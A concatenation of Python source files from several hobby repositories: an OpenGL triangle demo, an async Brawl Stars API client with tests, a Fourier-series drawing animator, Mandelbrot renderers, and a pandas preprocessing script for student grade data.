vertex_array_object = GL.glGenVertexArrays(1)
GL.glBindVertexArray( vertex_array_object )
# Generate buffers to hold our vertices
vertex_buffer = GL.glGenBuffers(1)
GL.glBindBuffer(GL.GL_ARRAY_BUFFER, vertex_buffer)
# Get the position of the 'position' in parameter of our shader and bind it.
position = GL.glGetAttribLocation(shader, 'position')
GL.glEnableVertexAttribArray(position)
# Describe the position data layout in the buffer
GL.glVertexAttribPointer(position, 4, GL.GL_FLOAT, False, 0, ctypes.c_void_p(0))
# Send the data over to the buffer
GL.glBufferData(GL.GL_ARRAY_BUFFER, 48, vertices, GL.GL_STATIC_DRAW)
# Unbind the VAO first (Important)
GL.glBindVertexArray( 0 )
# Unbind other stuff
GL.glDisableVertexAttribArray(position)
GL.glBindBuffer(GL.GL_ARRAY_BUFFER, 0)
return vertex_array_object
def display(shader, vertex_array_object):
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glUseProgram(shader)
GL.glBindVertexArray( vertex_array_object )
GL.glDrawArrays(GL.GL_TRIANGLES, 0, 3)
GL.glBindVertexArray( 0 )
GL.glUseProgram(0)
def main():
pygame.init()
screen = pygame.display.set_mode((512, 512), pygame.OPENGL|pygame.DOUBLEBUF)
GL.glClearColor(0.5, 0.5, 0.5, 1.0)
GL.glEnable(GL.GL_DEPTH_TEST)
shader = OpenGL.GL.shaders.compileProgram(
OpenGL.GL.shaders.compileShader(vertex_shader, GL.GL_VERTEX_SHADER),
OpenGL.GL.shaders.compileShader(fragment_shader, GL.GL_FRAGMENT_SHADER)
)
vertex_array_object = create_object(shader)
clock = pygame.time.Clock()
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
return
if event.type == pygame.KEYUP and event.key == pygame.K_ESCAPE:
return
display(shader, vertex_array_object)
pygame.display.flip()
if __name__ == '__main__':
try:
main()
finally:
pygame.quit()
``` |
{
"source": "0dminnimda/brawlpython",
"score": 2
} |
#### File: brawlpython/brawlpython/api_toolkit.py
```python
from . import __version__, __name__
from .typedefs import STRDICT
from .cache_utils import somecachedmethod, iscorofunc
from asyncio import ensure_future as ensure, gather
from collections.abc import ByteString, Collection, Mapping, Sized
from functools import update_wrapper
import sys
from typing import Dict, Union
__all__ = (
"default_headers",
"make_headers",
"isliterals",
"iscollection",
"issized",
"isunit",
"isempty",
"ismapping",
"isrequiredcollection",
"same",
"unique",
"prepare_param",
"check_params",
"_rearrange_params",
"rearrange_params",
"_rearrange_args",
"rearrange_args",
"multiparams",
"add_api_name")
def default_headers() -> STRDICT:
return {
"dnt": "1",
"user-agent": f"{__name__}/{__version__} (Python {sys.version[:5]})",
"accept-encoding": ", ".join(("gzip", "deflate")),
"cache-control": "no-cache",
"pragma": "no-cache",
# "content-encoding": "utf-8",
}
def make_headers(api_key: str) -> STRDICT:
return {"authorization": f"Bearer {api_key}"}
def isliterals(obj):
return isinstance(obj, (str, ByteString))
def iscollection(obj):
return isinstance(obj, Collection)
def issized(obj):
return isinstance(obj, Sized)
def isunit(obj):
return issized(obj) and len(obj) == 1
def isempty(obj):
return issized(obj) and len(obj) == 0
def ismapping(obj):
return isinstance(obj, Mapping)
def isrequiredcollection(obj):
return (
iscollection(obj)
and not isliterals(obj)
and not ismapping(obj)
and not isempty(obj))
def same(elements):
return len(elements) == elements.count(elements[0])
def unique(x):
seen = list()
return not any(i in seen or seen.append(i) for i in x)
def prepare_param(param, lengths):
if isrequiredcollection(param):
if isunit(param):
return ("u", param[0])
else:
lengths.append(len(param))
return ("m", iter(param))
else:
return ("u", param)
def check_params(args, kwargs):
lengths = []
args = [prepare_param(param, lengths) for param in args]
kwargs = {
key: prepare_param(param, lengths) for key, param in kwargs.items()}
if len(lengths) < 1:
total_length = 1
else:
if not same(lengths):
raise ValueError(
"All allowed iterable parameters must be of the same length.")
total_length = lengths[0]
return args, kwargs, total_length
def _rearrange_params(args, kwargs):
new_args, new_kwargs, length = check_params(args[:], kwargs.copy())
for _ in range(length):
current_args = []
for (kind, val) in new_args:
if kind == "m":
val = next(val)
current_args.append(val)
current_kwargs = {}
for key, (kind, val) in new_kwargs.items():
if kind == "m":
val = next(val)
current_kwargs[key] = val
yield tuple(current_args), current_kwargs
def rearrange_params(*args, **kwargs):
return _rearrange_params(args, kwargs)
def _rearrange_args(args):
for a, kw in _rearrange_params(args, {}):
yield a
def rearrange_args(*args):
return _rearrange_args(args)
def multiparams(func):
if iscorofunc(func):
async def wrapper(*args, **kwargs):
params = _rearrange_params(args, kwargs)
tasks = [ensure(func(*a, **kw)) for a, kw in params]
return await gather(*tasks)
else:
def wrapper(*args, **kwargs):
params = _rearrange_params(args, kwargs)
return [func(*a, **kw) for a, kw in params]
return update_wrapper(wrapper, func)
```
#### File: brawlpython/brawlpython/clients.py
```python
import asyncio
from .api import (
default_api_dict, API, KINDS, KIND_VALS, KIND_KEYS,
OFFIC, CHI, STAR, OFFICS, UNOFFICS,
)
from .api_toolkit import rearrange_params, _rearrange_args
from .base_classes import AsyncInitObject, AsyncWith, SyncWith
from .cache_utils import iscorofunc
from .sessions import AsyncSession, SyncSession
from configparser import ConfigParser
from functools import update_wrapper
from types import TracebackType
from typing import (
Any,
Callable,
Coroutine,
Dict,
Generator,
Iterable,
Generic,
List,
Mapping,
Optional,
Sequence,
Set,
Tuple,
Type,
TypeVar,
Union,
)
from .typedefs import (STRS, JSONSEQ, JSONS, HANDLER,
NUMBER, INTSTR, BOOLS, STRDICT, AKW)
import time
__all__ = (
"AsyncClient",
"SyncClient",
"offic_gets_handler",
"star_gets_handler",
"gets_handler")
COLLECT = "collect"
RELEASE = "release"
DEFAULT = "default"
def offic_gets_handler(data_list: JSONSEQ) -> JSONSEQ:
results = []
for data in data_list:
get_items = data.get("items")
if get_items is not None and isinstance(get_items, list):
results.append(get_items)
else:
results.append(data)
return results
def star_gets_handler(data_list: JSONSEQ) -> JSONSEQ:
results = []
for data in data_list:
data.pop("status", None)
if len(data) == 1:
results += list(data.values())
else:
results.append(data)
return results
def gets_handler(self, data_list: JSONSEQ) -> JSONSEQ:
name = self._current_api
if name in OFFICS:
res = offic_gets_handler(data_list)
elif name == STAR:
res = star_gets_handler(data_list)
else:
res = data_list
if self._return_unit and len(res) == 1:
return res[0]
return res
def _find_save(self, kind: str, match: INTSTR,
parameter: str = None) -> Optional[JSONS]:
collectable = self._saves[kind]
count = len(collectable)
if isinstance(match, int):
if -count <= match < count:
return collectable[match]
elif isinstance(match, str):
match = match.upper()
if parameter is None:
for part in collectable:
if match in part.values():
return part
else:
for part in collectable:
if part.get(parameter) == match:
return part
return None # returns explicitly
def _rankings(self, kind: str, api: str,
key: Optional[INTSTR] = None,
code: str = "global",
limit: INTSTR = 200) -> JSONS:
if kind in KIND_KEYS:
kind = KINDS[kind]
if kind == KINDS["b"]:
if key is None:
raise ValueError(
"If the kind is b or brawlers, the key must be entered")
brawler = self.find_save("b", key)
if brawler is not None:
key = brawler["id"]
elif kind == KINDS["ps"]:
if key is None:
key = -1
powerplay = self.find_save("ps", key)
if powerplay is not None:
key = powerplay["id"]
if key is None:
key = ""
return ("rankings",), {"code": code, "kind": kind,
"id": key, "limit": limit}
def get_and_apply_api_keys(filename: str, section: str,
api_dict: Dict[str, API]) -> None:
if filename.endswith(".env"):
raise ValueError("this file extension is not accepted")
# if filename.endswith(".ini"):
config = ConfigParser()
config.read(filename)
config = config[section]
for name, api in api_dict.items():
if name in OFFICS:
name = OFFIC
api_key = config.get(name + "_api_key")
api.set_api_key(api_key)
class AsyncClient(AsyncInitObject, AsyncWith):
_gets_handler = gets_handler
async def __init__(
self, # api_keys: Union[str, STRDICT],
config_file_name: str = "config.ini",
section: str = "DEFAULT",
api_dict: Dict[str, API] = {},
default_api: str = OFFIC,
return_unit: bool = True,
min_update_time: NUMBER = 60 * 10,
data_handler: HANDLER = gets_handler,
trust_env: bool = True,
cache_ttl: NUMBER = 60,
cache_limit: int = 1024,
use_cache: bool = True,
timeout: NUMBER = 30,
repeat_failed: int = 3) -> None:
self.session = await AsyncSession(
trust_env=trust_env, cache_ttl=cache_ttl,
cache_limit=cache_limit, use_cache=use_cache,
timeout=timeout, repeat_failed=repeat_failed)
self.api_dict = {**default_api_dict, **api_dict}
get_and_apply_api_keys(config_file_name, section, self.api_dict)
self._current_api = self._default_api = default_api
self._return_unit = return_unit
self._gets_handler = data_handler
self._requests = []
self._mode = DEFAULT
self._saves = {}
self._min_update_time = min_update_time
await self.update_saves(True)
async def close(self) -> None:
"""Close session"""
await self.session.close()
@property
def closed(self) -> bool:
"""Is client session closed.
A readonly property.
"""
return self.session.closed
async def _gets(self, *args) -> JSONSEQ:
# not_collect =
resps = await self.session.gets(*args)
if self.session.mode != COLLECT:
return self._gets_handler(resps)
if self.session.mode == RELEASE:
return resps # None
def _get_api(self, api: str):
return self.api_dict[api]
async def _fetchs(self, paths: STRS, api_names: str,
from_json: BOOLS = True, rearrange: bool = True,
**kwargs) -> JSONS:
if rearrange:
urls = []
headers = []
pars = rearrange_params(api_names, paths, **kwargs)
for (api_name, *a), kw in pars:
api = self._get_api(api_name)
urls.append(api.make_url(*a, **kw))
headers.append(
(api.headers)) # self.session.headers_handler
else:
api = self._get_api(api_names)
urls = api.make_url(paths, **kwargs)
headers = self.session.headers_handler(api.headers)
return await self._gets(urls, from_json, headers)
def collect(self):
self.session.collect()
async def release(self):
return self._gets_handler(await self.session.release())
# @add_api_name(None)
async def test_fetch(self, *args, **kwargs):
return await self._fetchs(*args, **kwargs)
async def players(self, tag: str, api: str = OFFIC) -> JSONS:
return await self._fetchs("players", api, tag=tag)
async def battlelog(self, tag: str, api: str = OFFIC) -> JSONS:
return await self._fetchs("battlelog", api, tag=tag)
async def clubs(self, tag: str, api: str = OFFIC) -> JSONS:
return await self._fetchs("clubs", api, tag=tag)
async def members(self, tag: str, limit: INTSTR = 100,
api: str = OFFIC) -> JSONS:
return await self._fetchs("members", api, tag=tag, limit=limit)
async def rankings(self, kind: str,
key: Optional[INTSTR] = None,
code: str = "global",
limit: INTSTR = 200,
api: str = OFFIC) -> JSONS:
pars = rearrange_params(kind, api, key=key, code=code, limit=limit)
self.collect()
for args, kwargs in pars:
a, kw = _rankings(self, *args, **kwargs)
await self._fetchs(*a, rearrange=False, **kw)
return await self.release()
async def brawlers(self, id: INTSTR = "", limit: Optional[INTSTR] = None,
api: str = OFFIC) -> JSONS:
return await self._fetchs("brawlers", api, id=id, limit=limit)
async def powerplay(self, code: str = "global", limit: int = 200,
api: str = OFFIC) -> JSONS:
return await self._fetchs("rankings", api, code=code, limit=limit,
kind=KINDS["ps"])
async def events(self, api: str = STAR) -> JSONS:
return await self._fetchs("events", api)
async def icons(self, api: str = STAR) -> JSONS:
return await self._fetchs("icons", api)
async def maps(self, id: INTSTR = "", api: str = STAR) -> JSONS:
return await self._fetchs("maps", api, id=id)
async def gamemodes(self, api: str = STAR) -> JSONS:
return await self._fetchs("gamemodes", api)
async def clublog(self, tag: str, api: str = STAR) -> JSONS:
return await self._fetchs("clublog", api, tag=tag)
async def translations(self, code: str = "", api: str = STAR) -> JSONS:
return await self._fetchs("translations", api, code=code)
# TODO: api rearrange
async def update_saves(self, now: bool = False, api: str = OFFIC) -> None:
if now or time.time() - self._last_update >= self._min_update_time:
self.collect()
await self.brawlers(api=api)
await self.powerplay(api=api)
b, ps = await self.release()
self._saves.update({"b": b, "ps": ps})
self._last_update = time.time()
find_save = _find_save
class SyncClient(SyncWith):
def __init__(
self, api_keys: Union[str, STRDICT],
api_dict: Dict[str, API] = {},
# default_api: str = OFFIC,
return_unit: bool = True,
min_update_time: NUMBER = 60 * 10,
data_handler: HANDLER = gets_handler,
trust_env: bool = True,
cache_ttl: NUMBER = 60,
cache_limit: int = 1024,
use_cache: bool = True,
timeout: NUMBER = 30,
repeat_failed: int = 3) -> None:
self.session = SyncSession(
trust_env=trust_env, cache_ttl=cache_ttl,
cache_limit=cache_limit, use_cache=use_cache,
timeout=timeout, repeat_failed=repeat_failed
)
self.api_dict = {**default_api_dict, **api_dict}
# self._current_api = self._default_api = default_api
if isinstance(api_keys, str):
self.api_dict[default_api].set_api_key(api_keys)
else:
for name, api_key in api_keys.items():
self.api_dict[name].set_api_key(api_key)
self._return_unit = return_unit
self._gets_handler = data_handler
self._saves = {}
self._min_update_time = min_update_time
self.update_saves(True)
def close(self) -> None:
"""Close session"""
self.session.close()
@property
def closed(self) -> bool:
"""Is client session closed.
A readonly property.
"""
return self.session.closed
def _gets(self, *args: Any, **kwargs: Any) -> JSONSEQ:
resps = self.session.gets(*args, **kwargs)
return self._gets_handler(self, resps)
def _get_api(self):
if self._current_api is None:
self._current_api = self._default_api
return self.api_dict[self._current_api]
def _fetch(self, path: str, from_json: bool = True,
**kwargs: Any) -> JSONS:
api = self._get_api()
return self._gets(
api.get(path, **kwargs), headers=api.headers, from_json=from_json)
def _fetchs(self, paths: Union[STRS, AKW], from_json: BOOLS = True,
rearrange: bool = True, **kwargs: Any) -> JSONS:
api = self._get_api()
if rearrange:
pars = rearrange_params(paths, **kwargs)
else:
pars = paths
urls = [api.get(*a, **kw) for a, kw in pars]
return self._gets(urls, headers=api.headers, from_json=from_json)
# @add_api_name(None)
def test_fetch(self, *args, **kwargs):
return self._fetchs(*args, **kwargs)
# @add_api_name(OFFIC)
def players(self, tag: str) -> JSONS:
return self._fetchs("players", tag=tag)
# @add_api_name(OFFIC)
def battlelog(self, tag: str) -> JSONS:
return self._fetchs("battlelog", tag=tag)
# @add_api_name(OFFIC)
def clubs(self, tag: str) -> JSONS:
return self._fetchs("clubs", tag=tag)
# @add_api_name(OFFIC)
def members(self, tag: str, limit: INTSTR = 100) -> JSONS:
return self._fetchs("members", tag=tag, limit=limit)
# @add_api_name(OFFIC)
def rankings(self, kind: str,
key: Optional[INTSTR] = None,
code: str = "global",
limit: INTSTR = 200) -> JSONS:
pars = rearrange_params(
kind, key=key, code=code, limit=limit)
return self._fetchs(
[_rankings(self, *a, **kw) for a, kw in pars], rearrange=False)
# @add_api_name(OFFIC)
def brawlers(self, id: INTSTR = "",
limit: INTSTR = "") -> JSONS:
return self._fetchs("brawlers", id=id, limit=limit)
# @add_api_name(OFFIC)
def powerplay(self, code: str = "global", limit: int = 200) -> JSONS:
return self._fetchs("rankings", code=code, limit=limit,
kind=KINDS["ps"], id="")
# @add_api_name(STAR)
def events(self) -> JSONS:
return self._fetchs("events")
# @add_api_name(STAR)
def icons(self) -> JSONS:
return self._fetchs("icons")
# @add_api_name(STAR)
async def maps(self, id: INTSTR = "") -> JSONS:
return self._fetchs("maps", id=id)
# @add_api_name(STAR)
def gamemodes(self) -> JSONS:
return self._fetchs("gamemodes")
# @add_api_name(STAR)
def clublog(self, tag: str) -> JSONS:
return self._fetchs("clublog", tag=tag)
# @add_api_name(STAR)
def translations(self, code: str = "") -> JSONS:
return self._fetchs("translations", code=code)
# @add_api_name(OFFIC)
def update_saves(self, now: bool = False) -> None:
if now or time.time() - self._last_update >= self._min_update_time:
self._saves.update({
"b": self.brawlers(api=self._current_api),
"ps": self.powerplay(api=self._current_api)
})
self._last_update = time.time()
find_save = _find_save
```
#### File: brawlpython/tests/test_async_client.py
```python
import asyncio
from brawlpython import AsyncClient
from brawlpython.api_toolkit import unique, same
from brawlpython.cache_utils import iscoro
from configobj import ConfigObj
import pytest
url_uuid = "http://httpbin.org/uuid"
config = ConfigObj("config.ini")
api_key = config["DEFAULT"].get("API_KEY")
@pytest.fixture
def factory(loop):
client = None
async def maker(*args, **kwargs):
nonlocal client
client = await AsyncClient(*args, **kwargs)
return client
yield maker
if client is not None:
loop.run_until_complete(client.close())
@pytest.fixture
def client(factory, loop):
return loop.run_until_complete(factory(api_key))
async def test_async_init():
client = AsyncClient(api_key)
assert iscoro(client)
assert isinstance(await client, AsyncClient)
async def test_closing(client):
assert not client.closed
for _ in 1, 2:
await client.close()
assert client.closed
async def no_test_cache(client):
responses = [await client._get(url_uuid) for _ in range(2)]
assert same(responses)
await asyncio.sleep(2)
assert await client._get(url_uuid) != responses[0]
async def no_test_no_cache(factory):
client = await factory(api_key, use_cache=False)
assert unique([await client._get(url_uuid) for _ in range(2)])
assert unique(await client._gets([url_uuid] * 2))
# FIXME: complete test
async def test_data_handler(factory):
client = await factory(api_key, data_handler=lambda *x: None)
await client._get(url_uuid)
if __name__ == "__main__":
import run_tests
run_tests.run(__file__)
```
#### File: brawlpython/tests/test_async_session.py
```python
import pytest
import asyncio
from brawlpython.sessions import AsyncSession
from brawlpython.api_toolkit import unique, same
from brawlpython.cache_utils import iscoro
from configobj import ConfigObj
url_uuid = "http://httpbin.org/uuid"
# @pytest.yield_fixture
# def api_key():
config = ConfigObj("config.ini")
api_key = config["DEFAULT"].get("API_KEY")
@pytest.fixture
def factory(loop):
client = None
async def maker(*args, **kwargs):
nonlocal client
client = await AsyncSession(*args, **kwargs)
return client
yield maker
if client is not None:
loop.run_until_complete(client.close())
@pytest.fixture
def client(factory, loop):
return loop.run_until_complete(factory(api_key, cache_ttl=1))
async def test_async_init():
client = AsyncSession(api_key)
assert iscoro(client)
assert isinstance(await client, AsyncSession)
async def test_closing(client):
assert not client.closed
for _ in 1, 2:
await client.close()
assert client.closed
async def test_cache(client):
responses = [await client.get(url_uuid) for _ in range(2)]
assert same(responses)
await asyncio.sleep(2)
assert await client.get(url_uuid) != responses[0]
async def test_no_cache(factory):
client = await factory(api_key, use_cache=False)
assert unique([await client.get(url_uuid) for _ in range(2)])
assert unique(await client.gets([url_uuid] * 2))
if __name__ == "__main__":
import run_tests
run_tests.run(__file__)
``` |
{
"source": "0dminnimda/fourier-series",
"score": 3
} |
#### File: fourier-series/complex_fourier_series/animator.py
```python
from typing import List, Tuple, Union
import pygame as pg
from pygame.locals import K_ESCAPE, KEYDOWN, QUIT
from pygame.math import Vector2
from .series import Series
from .svg_handling import FLOAT_TO_COMPLEX, create_path_function_from_file
__all__ = (
"BLACK",
"VECTOR_COLOR",
"VECTOR_WIDTH",
"PATH_COLOR",
"PATH_WIDTH",
"main_loop",
"draw",
"draw_arrow",
"draw_path",
"complex_to_tuple")
BLACK = (0, 0, 0)
VECTOR_COLOR = (255, 0, 0)
VECTOR_WIDTH = 1
PATH_COLOR = (0, 255, 0)
PATH_WIDTH = 1
def main_loop(size: Tuple[int, int], path_func: FLOAT_TO_COMPLEX,
quantity: int, time_divider: Union[int, float], ):
display = pg.display.set_mode(size)
series: Series = Series()
series.create_formulas(quantity, path_func)
time: int = 0
path: List[Vector2] = []
offset: complex = complex(*size) / 2
while 1:
for event in pg.event.get():
if event.type == QUIT:
return None
if event.type == KEYDOWN:
if event.key == K_ESCAPE:
return None
display.fill(BLACK)
draw(display, series, offset, time/time_divider, path)
time += 1
pg.display.flip()
if time == int(2 * time_divider):
time = 0
del path[:int(time_divider)]
def draw(display: pg.Surface, series: Series, offset: complex,
time: float, path: List[complex]) -> None:
values: List[complex] = series.evaluate_all(time)
current_value: complex = 0j
for value in values:
new_value: complex = current_value + value
draw_arrow(display,
current_value + offset,
new_value + offset)
current_value = new_value
path.append(Vector2(
complex_to_tuple(current_value + offset)))
draw_path(display, path)
def draw_arrow(display: pg.Surface,
from_val: complex,
to_val: complex) -> None:
pg.draw.line(display,
VECTOR_COLOR,
complex_to_tuple(from_val),
complex_to_tuple(to_val),
VECTOR_WIDTH)
def draw_path(display: pg.Surface,
path: List[Vector2]) -> None:
if len(path) < 2:
return
pg.draw.aalines(display, PATH_COLOR, False, path) # PATH_WIDTH,
def complex_to_tuple(value: complex) -> Tuple[float, float]:
return ((value.real), (value.imag))
```
#### File: fourier-series/complex_fourier_series/series.py
```python
from cmath import exp, tau
from typing import List
import numpy as np
from quadpy import quad
from .svg_handling import FLOAT_TO_COMPLEX
TAU_I: complex = tau * 1j
def create_nth_constant_function(
n: int, path_func: FLOAT_TO_COMPLEX) -> FLOAT_TO_COMPLEX:
def f(t: float) -> complex:
return path_func(t) * exp(-n * TAU_I * t)
return f
def calculate_nth_constant(
n: int, constant_func: FLOAT_TO_COMPLEX) -> complex:
def array_f(array: np.array):
return np.array(list(map(constant_func, array)))
return quad(array_f, 0., 1., limit=30000)[0]
def create_nth_series_function(
n: int, nth_constant: complex) -> FLOAT_TO_COMPLEX:
def f(t: float) -> complex:
return nth_constant * exp(n * TAU_I * t)
return f
def get_frequency_by_index(index: int) -> int:
"""
-> 0 1 2 3 4 5 6 7 8 ...
<- 0 1 -1 2 -2 3 -3 4 -4 ...
"""
sign: int = -1 if index % 2 == 0 else 1
return ((index + 1) // 2) * sign
class Series:
__slots__ = "_formulas",
def __init__(self) -> None:
self._formulas: List[FLOAT_TO_COMPLEX] = []
def create_formulas(
self, quantity: int, path_func: FLOAT_TO_COMPLEX) -> None:
self._formulas.clear()
for i in range(quantity):
n = get_frequency_by_index(i)
constant_func: FLOAT_TO_COMPLEX = (
create_nth_constant_function(
n, path_func))
constant: complex = (
calculate_nth_constant(
n, constant_func))
self._formulas.append(
create_nth_series_function(
n, constant))
def evaluate_all(self, time: float) -> List[complex]:
return [
formula(time)
for formula in self._formulas
]
``` |
{
"source": "0dminnimda/mondebrot_painter",
"score": 3
} |
#### File: mondebrot_painter/2019/offic.py
```python
import cv2 as cv
import time
import numpy as np
import multiprocessing as mp
from multiprocessing import Process
def st(z):
r = z[0]**2-(z[1]**2)
i = z[0]*z[1]*2
return r, i
def f(z, c):
s = st(z)
r = s[0]+c[0]
i = s[1]+c[1]
return r, i
def mon(r, i, n=100):
z = (0, 0)
c = (r, i)
try:
for i in range(n):
z = f(z, c)
except OverflowError:
p = False
else:
p = True
return p
def drmon(qlt, devi1, dell, part, qq=0):
part -= 1
# qlt*=2
sqq = sqrt(qlt)
de = 100*qlt
h1 = de*-1.25
v1 = de*-2.1 # qlt*185
hr, vr = (250/devi1)*qlt+1, (265/dell)*qlt
v1 += vr*part
#print(-h1+(h1+hr), -v1+(v1+vr), qlt, devi1, dell, part)
h1, v1, de, hr, vr = int(h1), int(v1), int(de), int(hr), int(vr)
#print(-h1+(h1+hr), -v1+(v1+vr), qlt, devi1, dell, part)
ww = [[[None, i/de, j/de] for j in range(h1, h1+hr)] for i in range(v1, v1+vr)]
for i in ww:
for j in i:
j[0] = mon(j[1], j[2])
if qq != 0:
qq.put(ww)
else:
return ww
def funccol(qlt, mode, dell):
ran = range(1, dell+1)
qq, pr, w, wg = {}, {}, {}, []
for i in ran:
qq[i] = mp.Queue()
pr[i] = Process(target=drmon, args=([qlt, mode, dell, i, qq[i]]))
pr[i].start()
for i in ran:
w[i] = qq[i].get()
wg += w[i]
pr[i].join()
return wg
def myar_to_img(w, fcolor, scolor, mode):
hei = len(w)*1
wid = len(w[0])*1
ar1 = np.zeros((hei, wid, 3), np.uint8)
ar1[:] = fcolor
ar = np.zeros((hei*2, wid*2, 3), np.uint8)
ii = -1
for i in w:
ii += 1
jj = -1
for j in i:
jj += 1
if j[0] is True:
ar1[ii][jj] = scolor
ar2 = np.copy(ar1)
for i in range(len(ar2)):
ar2[i][::] = ar2[i][::-1]
ar1 = ar1[0:len(ar1), 0:len(ar1[0])-1]
ar = np.concatenate((ar1, ar2), axis=1)
if mode == 1:
return ar2
elif mode == 2:
return ar
else:
return "error"
if __name__ == '__main__':
#for i in range(1,11):
# drmon(2**i,2,1,1)
factor = 0
while 1:
factor += 1 # quality factor
start_0 = time.time()
qual = 2**factor # quality
processes_num = 8 # number of processes used in multiprocessing
mode = 2 # when “1” calculates the whole image,
# when “2” calculates the mirror half; only affects performance
# h1,v1 = 50,50
myar = funccol(qual, mode, processes_num) # multiprocessing
img = myar_to_img(myar, (255, 255, 255), (0, 0, 0), mode)
end_0 = time.time() - start_0
print(end_0, "sec")
# cv.namedWindow ( "b" , cv.WINDOW_NORMAL)
cv.imshow(f"mon_img_{qual}", img)
cv.imwrite(f"mon_img_{qual}.png", img)
cv.waitKey(0)
cv.destroyAllWindows()
```
#### File: mondebrot_painter/2020/my_pickle.py
```python
import os
import pickle
def dump(name, value, end=".pickle"):
full_name = check_name(name, end)
create(name)
with open(full_name, "wb") as file:
pickle.dump(value, file)
return value
def create(name, end=".pickle", only=None):
full_name = check_name(name, end)
# existing test
try:
open(full_name, "xb").close()
except Exception: pass
# filling test
if not file_size(name) > 0:
with open(full_name, "wb") as file:
# create main array
if only is None:
pickle.dump([], file)
def load(name, end=".pickle"):
full_name = check_name(name, end)
with open(full_name, 'rb') as file:
return pickle.load(file)
def check_len(name, end=".pickle"):
return len(load(name, end))
def file_size(name, end=".pickle"):
full_name = check_name(name, end)
return os.path.getsize(full_name)
def check_name(name, end):
if name.starswith(end):
return name
else:
return name + end
``` |
{
"source": "0dminnimda/NTO_bigdata_2020_final",
"score": 3
} |
#### File: 0dminnimda/NTO_bigdata_2020_final/filee.py
```python
import pandas as pd
# import lightgbm
data = pd.read_csv("X_train.csv", index_col=0)
data["mark"] = pd.read_csv("y_train.csv", index_col=0)["mark"]
stud_info = pd.read_csv("studs_info.csv", index_col=False)
X_validation = pd.read_csv("X_test.csv", index_col=0)
# rename columns
field_map = {
"STD_ID": "stud",
"НАПРАВЛЕНИЕ": "profession",
"ГОД": "year",
"АТТЕСТАЦИЯ": "exam_type",
"ДИСЦИПЛИНА": "discipline",
"КУРС": "course",
"СЕМЕСТР": "semester",
" number": "number",
"Пол": "sex",
"Статус": "state",
"Дата выпуска": "release_date",
"Категория обучения": "category",
"Форма обучения": "study_kind",
"Шифр": "cipher",
"направление (специальность)": "speciality",
" ": "what?",
"Образование": "lvl_of_education",
"Дата выдачи": "issue_date",
"Что именно закончил": "education",
}
data.rename(columns=field_map, inplace=True)
X_validation.rename(columns=field_map, inplace=True)
stud_info.rename(columns=field_map, inplace=True)
stud_info.drop(stud_info[stud_info["stud"] == 92222].index, inplace=True)
# stud_info[np.isin(stud_info["number"], range(850, 900))].sort_values(by=["stud"])
# all(stud_info.groupby("speciality")["cipher"].nunique().eq(1))# and
all(stud_info.groupby("cipher")["speciality"].nunique().eq(1))
g = stud_info.groupby("speciality")["cipher"].nunique()
print(g[g != 1])
set(stud_info[stud_info["speciality"] == "Журналистика"]["cipher"])
# 203283
# remove duplicate entries (older ones)
stud_info = stud_info.sort_values(by=["stud", "issue_date"], na_position="first")
stud_info.drop_duplicates(subset=["stud"], keep="last", inplace=True)
import numpy as np
assert len(stud_info[np.isin(stud_info["stud"], stud_info[stud_info.duplicated(subset=["stud"])])]) == 0
# clean up
# for each stud: year == course + const
# for each stud: course == ceil(semester / 2)
# therefore they are noise
fields = ["year", "course"]
data.drop(fields, axis=1, inplace=True)
X_validation.drop(fields, axis=1, inplace=True)
# all nulls and not present in data / validation
stud_info.drop(stud_info[stud_info["stud"] == 92222].index, inplace=True)
# for each stud: all number_s are equal
assert all(stud_info.groupby("number")["stud"].nunique().le(1)) and all(stud_info.groupby("stud")["number"].nunique().le(1))
fields = ["number", "issue_date", "release_date"]
stud_info.drop(fields, axis=1, inplace=True)
{
# ('НС', 'СР'): 4,
# ('ОСН', 'СР'): 3,
# ('НС', 'СП'): 5,
# ('СР', 'СП'): 111,
# ('ОСН', 'СП'): 24,
# ('ОО', 'СР'): 22,
# ('ОО', 'СП'): 131,
('НП', 'СР'): 1,
('НП', 'СП'): 10,
('СП', 'СП'): 7,
('СР', 'СР', 'СП'): 1,
('СР', 'СР'): 1,
('СП', 'СР'): 1,
('СП', 'НП'): 1}
# ('ОО', 'СР' )
# ( 'СР', 'СП')
# ('ОО', 'СП')
# ('ОО', 'СР', 'СП')
# ( 'ОСН', 'СР' )
# ( 'ОСН', 'СП' )
('ОО', 'ОСН', 'СР', 'СП')
('НС', 'СР' )
('НС', 'СП')
# # SeriesGroupBy.cummax()
stud_info
stud_info.fillna({"lvl_of_education": "НЕТ", "what?": 0.0}, inplace=True)
data = data.merge(stud_info, how="left", on="stud")
X_validation = X_validation.merge(stud_info, how="left", on="stud")
data
# encode labels
from sklearn import preprocessing
fields = ["discipline", "profession", "exam_type", "sex", "category", "speciality", "education", "state", "cipher"]
le_s = {
field_name: preprocessing.LabelEncoder().fit(pd.concat([data[field_name], X_validation[field_name]]))
for field_name in fields}
order = [
"НЕТ", # 190 Нет данных
"ОО", # 160 Начальное общее образование
"ОСН", # 32 Основное общее образование
"НС", # 14 Неполное среднее образование
"СР", # 4101 Среднее общее образование
"НВ", # 2 Неполное высшее образование
"НП", # 50 Начальное/Незаконченное? профессиональное образование
"СП", # 916 Среднее профессиональное образование
]
le_s["lvl_of_education"] = preprocessing.LabelEncoder().fit(order)
order = ["В", "Д", "З"] # вечернее, дневное, заочное
le_s["study_kind"] = preprocessing.LabelEncoder().fit(order)
for field_name, le in le_s.items():
data[field_name] = le.transform(data[field_name])
X_validation[field_name] = le.transform(X_validation[field_name])
# 69.0 to 69
fields = ["semester", "what?"]
for field_name in fields:
data[field_name] = data[field_name].astype(int)
X_validation[field_name] = X_validation[field_name].astype(int)
# normalize
data["semester"] -= 1
X_validation["semester"] -= 1
data
# means
fields = ["stud", "profession", "discipline", "speciality", "education", "cipher"]
for field_name in fields:
mean_mark = data.groupby(field_name).mean()["mark"]
mean_name = field_name + "_mean"
data[mean_name] = data[field_name].map(mean_mark)
X_validation[mean_name] = X_validation[field_name].map(mean_mark)
# create dummy variables
columns = []#"exam_type"]#, "discipline", "profession"]
data = pd.get_dummies(data, columns=columns)
X_validation = pd.get_dummies(X_validation, columns=columns)
# remove unneeded data
# use previous fields
# fields = ["stud", "discipline", "profession"]
data.drop(fields, axis=1, inplace=True)
X_validation.drop(fields, axis=1, inplace=True)
data
from sklearn.model_selection import train_test_split
from sklearn.model_selection import GridSearchCV
marks = data.pop("mark")
